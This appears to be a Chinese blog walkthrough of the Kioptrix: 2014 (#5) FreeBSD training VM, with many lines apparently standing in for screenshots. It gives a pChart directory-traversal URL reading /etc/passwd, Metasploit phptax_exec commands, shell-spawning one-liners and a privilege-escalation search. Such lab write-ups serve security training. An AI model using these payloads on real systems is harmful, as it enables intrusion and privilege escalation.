您的位置: 首页 > 文章 > vulhub——Kioptrix: 2014 (#5)[freebsd系统]

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

分类: 文章 • 2024-09-06 11:12:04

目录

目录遍历漏洞

信息收集

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

PChart

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

文件包含

尝试利用漏洞，http://192.168.190.190/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

目录遍历漏洞

由于这个系统是freebsd，所以可以知道apache的位置

该系统对应的配置文件目录/usr/local/etc/apache22/httpd.conf

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

https://github.com/d34dfr4m3/kioptrix_l5_xpl

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

MSF

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

exploit/multi/http/phptax_exec

set rhosts 192.168.190.190

set rport 8080

exploit

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

提权

python -c ‘import pty; pty.spawn(“/bin/bash”)’

echo os.system('/bin/bash')

/bin/sh -i

searchsploit freebsd 9 | grep Privilege

vulhub——Kioptrix: 2014 (#5)[freebsd系统]

vulhub——Kioptrix: 2014 (#5)[freebsd系统]